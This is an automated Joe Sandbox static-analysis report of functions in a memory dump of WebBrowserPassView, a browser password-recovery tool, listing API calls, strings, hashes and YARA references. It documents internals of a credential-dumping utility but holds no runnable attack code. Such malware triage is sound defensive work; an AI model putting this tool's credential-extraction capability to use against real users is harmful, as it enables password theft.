API String ID: 2012295524-70141382
Opcode ID: 525b725ba8c3cdc06b652b5915534c9690f6b9e2340cfe00d9bbfd5c1f2d1a79
Instruction ID: 5d1c1eff7ac7706bec5e35702e10e1a9346d9393ddc5072ea1b98c1f41432ca5
Opcode Fuzzy Hash: 525b725ba8c3cdc06b652b5915534c9690f6b9e2340cfe00d9bbfd5c1f2d1a79
Instruction Fuzzy Hash: 080175B0941B15D9D7115B35ED00BBB3FA49B85B82B10003BEC14D2A92DBBCC8469B6D

Uniqueness

Uniqueness Score: -1.00%

Function 0041528A Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,004138C5), ref: 00415299
GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 004152B2
GetProcAddress.KERNEL32(00000000,Module32First), ref: 004152C3
GetProcAddress.KERNEL32(00000000,Module32Next), ref: 004152D4
GetProcAddress.KERNEL32(00000000,Process32First), ref: 004152E5
GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004152F6

Strings

kernel32.dll, xrefs: 00415294
Module32First, xrefs: 004152BD
CreateToolhelp32Snapshot, xrefs: 004152AC
Module32Next, xrefs: 004152CE
Process32Next, xrefs: 004152F0
Process32First, xrefs: 004152DF

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleModule
String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
API String ID: 667068680-3953557276
Opcode ID: 26c7815ee6b58201438f61c557156c8ff69da56f2b6ddbed2f7ec124cb4fbf79
Instruction ID: 5e4339a03d4da52fda9f673776543f218f6d4f87af018ab15887d8e286533b58
Opcode Fuzzy Hash: 26c7815ee6b58201438f61c557156c8ff69da56f2b6ddbed2f7ec124cb4fbf79
Instruction Fuzzy Hash: 70F08630905B19E997215F35AD61BBF2EE89785B82714043BEC00D3296DBA8C8468AAC

Uniqueness

Uniqueness Score: -1.00%

Function 00411CBF Relevance: 19.7, APIs: 13, Instructions: 189windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00411D4C
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00411D57
ReleaseDC.USER32 ref: 00411D6C
SetBkMode.GDI32(?,00000001), ref: 00411D7F
SetTextColor.GDI32(?,00FF0000), ref: 00411D8D
SelectObject.GDI32(?,?), ref: 00411D9E
DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00411DD2
SelectObject.GDI32(00000014,00000005), ref: 00411DDE

Part of subcall function 00411B13: GetCursorPos.USER32(?), ref: 00411B1D
Part of subcall function 00411B13: GetSubMenu.USER32 ref: 00411B2B
Part of subcall function 00411B13: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 00411B5C

GetModuleHandleW.KERNEL32(00000000), ref: 00411DF9
LoadCursorW.USER32(00000000,00000067), ref: 00411E02
SetCursor.USER32(00000000), ref: 00411E09
PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00411E51
memcpy.MSVCRT ref: 00411E9A

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
String ID:
API String ID: 1700100422-0
Opcode ID: 1cf45927c7e1b7e483f25d449432d44785f5cb0323d7f80aabb60001f85816e7
Instruction ID: c3388cb0b8e88e79d9fe84f40c546f28c4105956407e34fadf5c2981354f7f70
Opcode Fuzzy Hash: 1cf45927c7e1b7e483f25d449432d44785f5cb0323d7f80aabb60001f85816e7
Instruction Fuzzy Hash: 4D61B031604205ABDB14EFA4CC89BEA77A5FF44301F10452AFB059B2A1CB79AC91CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0040DF8F Relevance: 19.3, APIs: 3, Strings: 8, Instructions: 42COMMON

Download Yara Rule

APIs

Part of subcall function 0040A157: GetFileAttributesW.KERNELBASE(?,0040DF98,?,0040E04F,00000000,?,00000000,00000208,?), ref: 0040A15B

wcscpy.MSVCRT ref: 0040DFA9
wcscpy.MSVCRT ref: 0040DFB9
GetPrivateProfileIntW.KERNEL32 ref: 0040DFCA

Part of subcall function 0040DB0B: GetPrivateProfileStringW.KERNEL32 ref: 0040DB27

Strings

XE, xrefs: 0040DFA3
TranslatorURL, xrefs: 0040E002
charset, xrefs: 0040DFD8
hE, xrefs: 0040DFB3
TranslatorName, xrefs: 0040DFEE
xE, xrefs: 0040DFF3
general, xrefs: 0040DFAE
rtl, xrefs: 0040DFC4

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: PrivateProfilewcscpy$AttributesFileString
String ID: TranslatorName$TranslatorURL$XE$charset$general$hE$rtl$xE
API String ID: 3176057301-1663435254
Opcode ID: ce03a71f4104ba65c7634943c1c0a2916f24712798544291b36441c7694ed038
Instruction ID: 3d8b461fbaaec7ca5a0689e4e93172b3bcab4f1f7887f11f1c83d51a75cfd1f7
Opcode Fuzzy Hash: ce03a71f4104ba65c7634943c1c0a2916f24712798544291b36441c7694ed038
Instruction Fuzzy Hash: 31F0FC21FC132175E2253A635C07F2E35148BD3B57F5648BBBC147E1D3C66C5A48829E

Uniqueness

Uniqueness Score: -1.00%

Function 00410D08 Relevance: 18.1, APIs: 12, Instructions: 113COMMON

Download Yara Rule

APIs

GetClientRect.USER32 ref: 00410D27
GetWindowRect.USER32 ref: 00410D3D
GetWindowRect.USER32 ref: 00410D53
GetDlgItem.USER32 ref: 00410D8D
GetWindowRect.USER32 ref: 00410D94
MapWindowPoints.USER32 ref: 00410DA4
BeginDeferWindowPos.USER32 ref: 00410DC8
DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 00410DEB
DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 00410E0A
DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 00410E35
DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00410E4D
EndDeferWindowPos.USER32(?), ref: 00410E52

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: Window$Defer$Rect$BeginClientItemPoints
String ID:
API String ID: 552707033-0
Opcode ID: 9f9a1085919ae9ac6807100c514c4c2990173c35f6b033fad767d96a1109aff9
Instruction ID: f4b3975cf6f7d3be18b30986ddc530eb89c4367e0f7efeac37d180ea3f2c0f2c
Opcode Fuzzy Hash: 9f9a1085919ae9ac6807100c514c4c2990173c35f6b033fad767d96a1109aff9
Instruction Fuzzy Hash: AC41C275900209BFEB11DFA8DD89FEEBBBAFB48300F104565E615A21A0C772AA54DB14

Uniqueness

Uniqueness Score: -1.00%

Function 0040C532 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 110stringfileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C703,?,?,*.*,0040C76D,00000000), ref: 0040C552

Part of subcall function 0040A8EC: SetFilePointer.KERNEL32(0040C76D,?,00000000,00000000,?,0040C573,00000000,00000000,?,00000020,?,0040C703,?,?,*.*,0040C76D), ref: 0040A8F9

GetFileSize.KERNEL32(00000000,00000000), ref: 0040C582

Part of subcall function 0040C4A1: _memicmp.MSVCRT ref: 0040C4BB
Part of subcall function 0040C4A1: memcpy.MSVCRT ref: 0040C4D2

memcpy.MSVCRT ref: 0040C5C9
strchr.MSVCRT ref: 0040C5EE
strchr.MSVCRT ref: 0040C5FF
_strlwr.MSVCRT ref: 0040C60D
memset.MSVCRT ref: 0040C628
CloseHandle.KERNEL32(00000000), ref: 0040C675

Strings

4, xrefs: 0040C576
h, xrefs: 0040C5DA

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
String ID: 4$h
API String ID: 4066021378-1856150674
Opcode ID: da7a13692060ae409e5302e4995310e5dd5bbfb7a5391393f0fdcb30f537ecd3
Instruction ID: 65cccf327fa0b5529330076339007647872360192ef6f3cf49ce6089d60f06ae
Opcode Fuzzy Hash: da7a13692060ae409e5302e4995310e5dd5bbfb7a5391393f0fdcb30f537ecd3
Instruction Fuzzy Hash: 3B3182B1900218FEEB20EB64CC85EEE77ACEF05318F10457AF608E6181D7399F548B69

Uniqueness

Uniqueness Score: -1.00%

Function 004164F5 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 99COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00416523
memset.MSVCRT ref: 00416538
_snwprintf.MSVCRT ref: 00416552
_snwprintf.MSVCRT ref: 00416571
memset.MSVCRT ref: 004165A3
memset.MSVCRT ref: 004165B8
memset.MSVCRT ref: 004165CD
_snwprintf.MSVCRT ref: 004165E7
_snwprintf.MSVCRT ref: 00416604

Strings

%%0.%df, xrefs: 00416545, 004165DA

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: memset$_snwprintf
String ID: %%0.%df
API String ID: 3473751417-763548558
Opcode ID: c99c8e2211586e52f8e911d5eb7fbf623d9b3fc3e27082e659afd7ab3044fb1d
Instruction ID: 27f99667104659e00ebd78455ae99a1af8c3fb89703bd44fec75f468f68576de
Opcode Fuzzy Hash: c99c8e2211586e52f8e911d5eb7fbf623d9b3fc3e27082e659afd7ab3044fb1d
Instruction Fuzzy Hash: 2231A471840229BADB20EF55CC85FEB777CFF49314F0104EAB50DA2102E7349A54CB69

Uniqueness

Uniqueness Score: -1.00%

Function 004078E0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97timewindowCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000041,00000064,00000000), ref: 00407903
KillTimer.USER32(?,00000041), ref: 00407913
KillTimer.USER32(?,00000041), ref: 00407924
GetTickCount.KERNEL32 ref: 00407947
GetParent.USER32(?), ref: 00407972
SendMessageW.USER32(00000000), ref: 00407979
BeginDeferWindowPos.USER32 ref: 00407987
EndDeferWindowPos.USER32(00000000), ref: 004079D7
InvalidateRect.USER32(?,?,00000001), ref: 004079E3

Strings

A, xrefs: 0040792F

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
String ID: A
API String ID: 2892645895-3554254475
Opcode ID: af84783409e1975db288b0c72e71a8e687db4ca826836481a8f26c8b0f9bbfa9
Instruction ID: af3d0bace5b62026118a6a1531e93ae50cbe973fa598ddd1ec3a4275e27b1afc
Opcode Fuzzy Hash: af84783409e1975db288b0c72e71a8e687db4ca826836481a8f26c8b0f9bbfa9
Instruction Fuzzy Hash: F431C2B9640305BBEB201F61CC86FAB7B6ABB44711F00443AF709B91E0C7F9A855CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040DE05 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97windowCOMMON

Download Yara Rule

APIs

LoadMenuW.USER32 ref: 0040DE2D

Part of subcall function 0040DC55: GetMenuItemCount.USER32 ref: 0040DC6B
Part of subcall function 0040DC55: memset.MSVCRT ref: 0040DC8A
Part of subcall function 0040DC55: GetMenuItemInfoW.USER32 ref: 0040DCC6
Part of subcall function 0040DC55: wcschr.MSVCRT ref: 0040DCDE

DestroyMenu.USER32(00000000), ref: 0040DE4B
CreateDialogParamW.USER32 ref: 0040DEA0
GetDesktopWindow.USER32 ref: 0040DEAB
CreateDialogParamW.USER32 ref: 0040DEB8
memset.MSVCRT ref: 0040DED1
GetWindowTextW.USER32 ref: 0040DEE8
EnumChildWindows.USER32 ref: 0040DF15
DestroyWindow.USER32(00000005), ref: 0040DF1E

Part of subcall function 0040DA84: _snwprintf.MSVCRT ref: 0040DAA9

Strings

caption, xrefs: 0040DEFF

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
String ID: caption
API String ID: 973020956-4135340389
Opcode ID: de0643627d12cd9ffe249f933e94cd636f301555e7367070b26c87a68ee5e60d
Instruction ID: fb89002f7bebac49d56e068043a0f8d6468f1f005a4246ac5316588196cd2f0c
Opcode Fuzzy Hash: de0643627d12cd9ffe249f933e94cd636f301555e7367070b26c87a68ee5e60d
Instruction Fuzzy Hash: 3E317072900208BFEF11AF90DC85AAF3B69FB15364F10843AF905A91A1D7798998CF59

Uniqueness

Uniqueness Score: -1.00%

Function 004105A7 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 90COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004105DF
memset.MSVCRT ref: 004105F4
memset.MSVCRT ref: 00410609
_snwprintf.MSVCRT ref: 00410631
wcscpy.MSVCRT ref: 0041064D
_snwprintf.MSVCRT ref: 00410690

Strings

<meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410624
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 004105B7
<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410683
<table dir="rtl"><tr><td>, xrefs: 00410647

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: memset$_snwprintf$wcscpy
String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
API String ID: 1283228442-2366825230
Opcode ID: 86694fa9596e8e718e964b02816faf9a37d1d78763b9eb9bb7709ff927f38285
Instruction ID: 23ba5de25e919ab4fdab3582845b47b673a12a4a92696f01ca941476ed93b1dd
Opcode Fuzzy Hash: 86694fa9596e8e718e964b02816faf9a37d1d78763b9eb9bb7709ff927f38285
Instruction Fuzzy Hash: 1D21B8B5A001186BDB21BB95CC41EDA37BCEF58745F0140BEF508D3151DA389AC88F69

Uniqueness

Uniqueness Score: -1.00%

Function 004153A6 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82COMMON

Download Yara Rule

APIs

wcschr.MSVCRT ref: 004153BF
wcscpy.MSVCRT ref: 004153CF

Part of subcall function 00409DB6: wcslen.MSVCRT ref: 00409DC5
Part of subcall function 00409DB6: wcslen.MSVCRT ref: 00409DCF
Part of subcall function 00409DB6: _memicmp.MSVCRT ref: 00409DEA

wcscpy.MSVCRT ref: 0041541E
wcscat.MSVCRT ref: 00415429
memset.MSVCRT ref: 00415405

Part of subcall function 0040A394: GetWindowsDirectoryW.KERNEL32(0045EC58,00000104,?,0041545E,?,?,00000000,00000208,?), ref: 0040A3AA
Part of subcall function 0040A394: wcscpy.MSVCRT ref: 0040A3BA

memset.MSVCRT ref: 0041544D
memcpy.MSVCRT ref: 00415468
wcscat.MSVCRT ref: 00415474

Strings

\systemroot, xrefs: 004153DC

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
String ID: \systemroot
API String ID: 4173585201-1821301763
Opcode ID: fa167bbd5e4528be15fe591abc0a22bdfd687e9aef1f213e27ce40de2961ead0
Instruction ID: f104943179f08cd93f8001f39408b1af5f6ad57b201dd995218135a96354df9e
Opcode Fuzzy Hash: fa167bbd5e4528be15fe591abc0a22bdfd687e9aef1f213e27ce40de2961ead0
Instruction Fuzzy Hash: 572129B2506304A9F621F3A24C46EEB63EC9F46714F20455FF524D2082EB7C99C44B6F

Uniqueness

Uniqueness Score: -1.00%

Function 0041A5D7 Relevance: 16.6, APIs: 11, Instructions: 88COMMON

Download Yara Rule

APIs

Part of subcall function 004192F2: GetVersionExW.KERNEL32(?), ref: 00419315

GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 0041A603
malloc.MSVCRT ref: 0041A60E
free.MSVCRT(?), ref: 0041A61E
GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 0041A632
free.MSVCRT(?), ref: 0041A637
GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 0041A64D
malloc.MSVCRT ref: 0041A655
GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 0041A668
free.MSVCRT(?), ref: 0041A66D
free.MSVCRT(?), ref: 0041A681
free.MSVCRT(00000000,00455E58,00000000), ref: 0041A6A0

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: free$FullNamePath$malloc$Version
String ID:
API String ID: 3356672799-0
Opcode ID: 81b576499755cb31c8c6be5d07b3d32296e332f63dcbe60c266eca3a6750f240
Instruction ID: f6f3b6a306e4f0e49f71bf4976b7ceda75d2138abfea52430b05dfcd18a6bddb
Opcode Fuzzy Hash: 81b576499755cb31c8c6be5d07b3d32296e332f63dcbe60c266eca3a6750f240
Instruction Fuzzy Hash: 2121987190211CBFEF10BBA5DC46CDF7FA9DF41368B25007BF404A2161DB395E90966A

Uniqueness

Uniqueness Score: -1.00%

Function 00409EA1 Relevance: 16.6, APIs: 11, Instructions: 59clipboardmemoryfileCOMMON

Download Yara Rule

APIs

EmptyClipboard.USER32 ref: 00409EAB

Part of subcall function 00409C82: CreateFileW.KERNELBASE(00000003,80000000,00000003,00000000,00000003,00000000,00000000,0040D0E2,0040118B,0040118B,?,?,?,?,000003FF), ref: 00409C94

GetFileSize.KERNEL32(00000000,00000000), ref: 00409EC8
GlobalAlloc.KERNEL32(00002000,00000002), ref: 00409ED9
GlobalLock.KERNEL32 ref: 00409EE6
ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00409EF9
GlobalUnlock.KERNEL32(00000000), ref: 00409F0B
SetClipboardData.USER32 ref: 00409F14
GetLastError.KERNEL32 ref: 00409F1C
CloseHandle.KERNEL32(?), ref: 00409F28
GetLastError.KERNEL32 ref: 00409F33
CloseClipboard.USER32 ref: 00409F3C

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
String ID:
API String ID: 3604893535-0
Opcode ID: 44998ffc891bb225a56e9bb27206520a843834c4280dd8a38d2d5b5fef2c93d6
Instruction ID: f2b573886a777ddc08947e4f1f5a0494481de075c88f5d4f6b384ba28402c1a7
Opcode Fuzzy Hash: 44998ffc891bb225a56e9bb27206520a843834c4280dd8a38d2d5b5fef2c93d6
Instruction Fuzzy Hash: C4112E7A904209FFEB105FA0EC4DA9F7BB8EB45351F104176F902E2292DB748D09CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00416B16 Relevance: 16.6, APIs: 1, Strings: 10, Instructions: 50COMMON

Download Yara Rule

APIs

wcscpy.MSVCRT ref: 00416B89

Strings

Startup, xrefs: 00416B41
Programs, xrefs: 00416B4F
Start Menu, xrefs: 00416B3A
AppData, xrefs: 00416B6E
Common Startup, xrefs: 00416B7C
Desktop, xrefs: 00416B33
Common Programs, xrefs: 00416B83
Common Desktop, xrefs: 00416B75
Common Start Menu, xrefs: 00416B56
Favorites, xrefs: 00416B48

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: wcscpy
String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
API String ID: 1284135714-318151290
Opcode ID: dd6fa36c037bc6e4ff8f29b7a4256e51cef250e0a1f7438453280f81013bf7c0
Instruction ID: d324c76f68bf74469ccfd3712f78ba9dcc04a4285760018fac4a8f65c25a8c98
Opcode Fuzzy Hash: dd6fa36c037bc6e4ff8f29b7a4256e51cef250e0a1f7438453280f81013bf7c0
Instruction Fuzzy Hash: 95F036316ECF3562143415282916EFA401891317F73BB43176C0EE22E6C9CCF9CA905F

Uniqueness

Uniqueness Score: -1.00%

Function 0040D759 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32 ref: 0040D76F
memset.MSVCRT ref: 0040D793
GetMenuItemInfoW.USER32 ref: 0040D7CE
memset.MSVCRT ref: 0040D7FD
wcschr.MSVCRT ref: 0040D809
wcscat.MSVCRT ref: 0040D864
ModifyMenuW.USER32(?,?,00000400,?,?), ref: 0040D880

Strings

6, xrefs: 0040D7B9
0, xrefs: 0040D7AE

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
